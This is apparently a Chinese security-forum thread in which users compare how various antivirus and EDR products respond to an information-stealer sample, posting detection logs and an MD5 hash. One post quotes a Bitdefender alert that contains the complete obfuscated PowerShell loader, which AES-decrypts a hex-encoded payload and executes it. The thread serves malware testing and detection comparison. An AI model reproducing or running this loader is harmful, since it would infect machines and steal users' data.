Stealer 1x (VT 1)

显示全部楼层 · 发表于 6 天前

本帖最后由 superLYT 于 2024-12-16 12:55 编辑

t0kenzero 发表于 2024-12-16 12:40
SEP Kill

看来自管客户端阉割了防护啊，自管的SONAR只是提交了powershell命令，好像没有拦截

显示全部楼层 · 发表于 6 天前

本帖最后由 t0kenzero 于 2024-12-16 13:00 编辑

superLYT 发表于 2024-12-16 12:53
看来自管客户端阉割了防护啊，自管的SONAR只是提交了powershell命令，好像没有拦截

这是edr上的攻击链缓解检测，自适应防护生成的策略。

显示全部楼层 · 发表于 6 天前

t0kenzero 发表于 2024-12-16 12:58
这是edr上的攻击链缓解检测，自适应防护生成的策略。

哦哦，EDR不便宜啊

显示全部楼层 · 发表于 6 天前

事件: 检测到恶意对象
用户: DFMTC\liyingzhi
用户类型: 活动用户
组件: 病毒扫描
结果: 检测到
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.HTA.SAgent.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: RIWZ.mp4
对象路径: D:\360极速浏览器X下载
对象的 MD5: 680AFD34C149061ECF39A06606CAE671
原因: 机器学习
数据库发布日期: 今天，2024/12/16 上午11:39:00

显示全部楼层 · 发表于 6 天前

BD执行杀
实时防护检测到恶意命令行的执行。进程 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 被阻止, 由于执行了恶意命令行"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function JztT($taCjL){return -split ($taCjL -replace '..', '0x$& ')};$GjMwh = JztT('ACEABC81317F905FF413F0B23258E4847819A25B19B390271D95CCD36B5ED0BA0BB4B2D92A25AD1B6809471FAE7D5B392E90FBC0D44D05F02408B2FDBD4603D694F377684C4FA6C745279ECEE371A9501555B337A47CE1E58F4A51540457FF75DB7EF27D7A2FFB5E930A7A7EB8809F431769B67188202EFE982C062390A19C43DD2B5A0B266E54F72B098E09C3B90BC9FC826AF00D0C1D48C87C25AEEBB42831B5A9D1A81CBAB9279567605696339EEA288B5C383D3373AC9FE65BB5AEC7067FAA530382E159921D019DCDB08596F03F962ADF68EE27D0083B6FA4EF82EF7F4E7D52EFD1E190689A0D4377A7905144F3587E91D784EEA71568C8D91ABBD85CD55FB50301DFC1C8FA3C07D5108F6B5272AB5FD1D3A2B1A6C482BB7C8694528848EF64751A5461F21C6490CCC1EF779D69AA7FDCFCAB6C8016408E75F402CDE22EECAC38E7E373EF187A3B191A2E50814E12630459F8557DCF822F95A8C3DCDACD637506C496D9F2520A31DFB2EB7E310493831D65AB87A10DAA24C03A5AC327A82A1B43F1BC22B93CDCACFAAB6354BF80043E868C525BD1287435AC9A08C827ED325F434E61F1244638A49519CBFF59BC5FFD0D089A7D810CBD4D0459A50563795A257674F15100669E9A201609B3F878A95D48923DCCA967230BD5BDA39FEF40981E235C760A48F8BBCB2503FA7BD24E093573B25916CB9D9918E53DC09358F1460CBD61B17C2C50C8421396BD4FFA1612216A8BB2D5E75E26AD0C40F06017FF2A39DE7ABA3D150DC3266C6B6964AC2EA168C5D2EF364A85E521DF8D90F6E8C502CDDEFA948D4D712DA89CE9E360A913F0549857BC68E1370A33A461C3186EDD01A851E83901F5B96FF576F1713EF5ECC5A123B81293E9ACA0CBECFE87B56B01EA5734029439339E91133796A4B14C31A9DD58F86665ECCFDE44B45D7DF3D8F2E2BB3649C68C221D5528F2714CDC2EA18F6B5B00B084585DDC489F90A5FA7D2FE87B0A4AD57169BE278789FB4589151BF7BE5291734836A1B9B64F5E492DE60A51E7E4E577D6D9040590E9AC495BFB9E9DCA75A3B9D4C00575F8D2B88A04534B01D9B6C4D24A5A909537457A2F7851B71BE71D950390AFE40F01700E0862D0F4B5B62B604E636ADE6C39AEE7B0A5B93E14564C309719C2D2F13F89E459DFEC37169CDB01D71EABFB554561DD120DF18E2D58D4A0E6BF94860EB6524E52C610282DDB5A220E254B73EC736F79717E2792CDDEDC95ECECF283297EC357897216FDC7BF0F2CBE88CACCA233501B08D32173D56A6A0C6F49C58310A87B61959A96CA9AF8FE1E3DA247AA086D651FFEEA3D71A2E85E984C2CFED6D48A1A81BEB20152C0AC9B8EE995828E040ECA7E84B0B3DA11ED99937B379D40414C17B2823EEE8CCA447745DB8281A889EC85B0165BCD7A985F9E18CEDC9230FF8BD5557B72B8EADFEAB7DFDC718CAF9F5ABFE0FE6380BA078F3A9206746AF5D0230071BBE2C9A3D41B4B319ABDC48D1D92EEC690CF91ADDD38EACC45ECB2F656197EC5F4B6CAD445A0E30753B26892BEB808A0B283F419A45F5154B6A656D9196B9E1A34A4AEE455F76F400965793D610C73064621D53411E0837BAE0CAA52AE6D7D08F60532F5E1A92CE6806A5BC5DC0C3FC90B8489EC134A606E9DDD8CA4167A4513C6CA9C31C683367CC99A0C0C046F59AF7199C91B5431CBAED8A23E397DA0BDC69B1AA0A6650F7CF26FD2E1E19BD9A37D19DB9ED41274782F68BE136B497834C8E890B056F0E3FA479B3178336C4D5546EE84E69675D4FDB957C9DD3E1DFBD8B60D3C9827256DAC238CF0A5669B4FA16F93381D2961C1CE02A95FB73934BA1DA43212896B14FCC11D56B3A5D6DDD38C54CF493300D116B805638691541439EFFA80C1EAF0FC9B30B66F6EC8C2A1ECACEBF91B932B9A1FD45DF47FC3D16081E49F4F1222B0574C28052CDD9FFE8E1F0BB3B332D4DC139A6B7C699C867F76D1FF13ED57109866B3EE07F79D125AE777E6059E10DC425E39AAF6DB58F6A66119D3EE40D59AD4D2695E564F53FB427E02B754FE5FE6B6D9333CB3B7EBDD4AE91798BDB2F6DCF1E7159D5A60EA48FB0CED3A3797E05C66A24E3F8F335D839CCD73A356795D0E798E1847BDEE717768C8E7D06CA95ACD31B13D3E7467B196AD0C45AD607B9C88B279251D98AC1F70966A9D32FD784A1C60641BFA0F10F9CB6955929E8D91B2E3BAC28FEFDB9FA3B0EA2C8361B42FB321286801B688162404C306974B933308C898AB143A517289E4DAC66263FC8EC895802EB6CF9FA5C77D0CB9AB224028D389E5B534F755E5B56739CFD577109A8C03DE099D080090F8B96C8313F047CA23A65CBE7B0FE460DDCE9BF9DB3C27A6B13C703C6471B9486D4032527472CB8E990F2958A6BFBE609AC43B9E7D60DC2A4B39812ECC69F4B0D48480F9B6A1A194A45934084D60B4515221A2785521C34DC662C51207114C718B7F070166D047EDFFA07245CE1947660480EB642977DED7F749D73B1CDD155FCE275B28253082672B72DBB5BB871789042BC7A926AB7F9D729F8A1E8AA2BD4DD34A21A01CFB5C3CDE14CB26028E72D7E1B23B8A8107BF948E5035CD9B62ED531D5EB43BB743675D80C7A96F1D4EE2BE0CA614219AF2B01598EF89772E93AECDC151BF5F44E879DD23774FD667301FBE163FF4FF8E02F494A694740BD5C5CD7A2C9D80DEA5414FDC7BC4029AC7C3195F50CE38EC653B7B4BE51850E793EFE2EA0EE214BE87D2C5FFA8D7E12A1977A443F690A593C5ACBBBE4DD7DC45DE9B8916626E8CCB942459C8FF34265D7BC28EAB90A27CF1F352EB93CB81B73F9D774A03AB27470615BD4FE074A4CEDBB447A0AD8FBF1C8603E10BFFD15E81E2ED4F206EBA3FACC2E8B16FF3DD7195148396E83A24CE93CE66047FB38030C9BFDB3571BBAF3DFD0C4534FA1DF433E0EDF0546B51D59BD25356444C626468614FE799373FCB6AF447F5740FBF3D57417572AA1CDA82E93817A6045741E50753B9F8E83CB71DDFCDABD06C43B2935FDB28A589A7D5CF821C6FCCE5C27A9C0F343019204E793821F030A428241DF5797F424D357BE6143F878B30F31116984E099236200A01B392116D438E161C603AEA165481134990058645817A501D78A001C51183CE320131DC4F2A5BC802E28655AE55039F05E7B2BCC3D5970D0706A6D4C7EE2C256C9364AC8FFAD7CC12041392E2C587B3B85F6983FA67C2EA86B533EA6568C6E48C4DCE812DC869E0D427B2F41F276F8C99216B2EB935262B6E44A0051A1AEAA9FA965E21886BC7BBDE0F5EDA0F89EFC02FB28E76267D46A41630B20F36171582CC0DAA91D50E8C988FD59EBAAB49D8B6FE8C2C32DBD2C7B17DA6D91610CFF323B505828FEDAD633372C7622038B1E51A88FC52CC2BFAAFCD3C28A81547D57920647F62D1EA2F837F4047281E6163161E51A3F4E8CBB306B76707C256C4E88CD7D271C3EA0C991D257AE63B60D3550977FC51B49920332D9F392501501A7F63F8EEFA5E36BB773009C8A73E9FBAFC4BA76B22F32288BD19486C17E9EAD367DBA53A8657F6D2CEC5937DCB8295B8E5EE3C9427C469CFDC296331ECA0A3166AE07B30DFD7004BD1A21377E88ACDD30C3BE87198BDAE6DDA94B4BB337DF7D6382ADA8782184934E326A3B419EEE7E7EEA15D4441F3B561E1C6610F2D30230633FBCDBC7F9B7F75FEAEAB7C0CBA2DDBFF58E7DAE16E5A0B64B8930A8976FDCCFF1F5389B0857CCF17CEF0E5981732EB2AD59F84ED6BDB40E9D851EBD7E9B6DDE9DEACFB95F237BB49DDCAFF8E1E41D58F8C5D41AC50675679F2ED956ED14199F20AB4067B53D3CB7C8B52E128058F3AB5FB84BC8A771861E6F23B8CAF6C4E9B24E1903C5A0D8F772DDD877FBE83F2A63B129B4AF1EC8DBB2CC3F3BF7ABDA6C0C8ECD8FB89DA339E73F1246A800AB94BBE23E765614493055F76A13D2EA08567E2326869A1917875EA3D097C8B619A23D7F4E692E50B88C3149B0D684C31B82E9669AB6056B9E192D7AFE9C4B775D6491BC0DBAD62B020DF8FA6EC5DEEC3C0592F2B9783AA669BFC3B4A077BED3240506BAA2CE815C27FCC6C3F88F7771EB04993BE17FBEBE95EDBDFD7FA921CF44AD2417AD1A9575CDE2315D1AC8DDA3167E28AB68CCF20344C0412C23A50B0CE28A1FE11D0983D22DB72A2CD713E6E634555F0408F455BCE7FC23C2F46BEC3B1C148B3A1646BA7762D1EC6A29CF0E1BDB4468D29E441E8E9B576B12937677FA589258824BB99395A06134B33E0F7AB6461064B84A685665B01B5541D3B516CEEDE64695723AA575BDECF7BDE16150C2ACDFE9ECBA4AAFC86BF9A1FE1225AC26A03CDF91484B9323ACB307286C1C7B52ADD9B21217C436503AB03AFB9F23738D0C949D15BF0E8789C7B66D567CF4856A815FF6B27578C67FF56BBF18B0A5D62A2CE368D58E18D00470956F6AF65DFEB4401');$Sekeq=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((JztT('636E49666769615950755959474C6E63')),[byte[]]::new(16)).TransformFinalBlock($GjMwh,0,$GjMwh.Length)); & $Sekeq.Substring(0,3) $Sekeq.Substring(129)

显示全部楼层 · 发表于 6 天前

火绒双击

显示全部楼层 · 发表于 6 天前

Dr.web miss

显示全部楼层 · 发表于 6 天前

腾讯电脑管家 2X

显示全部楼层 · 发表于 6 天前

FSP无反应未双击

显示全部楼层 · 发表于 4 天前

瑞星 0x

[病毒样本] Stealer 1x (VT 1)

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源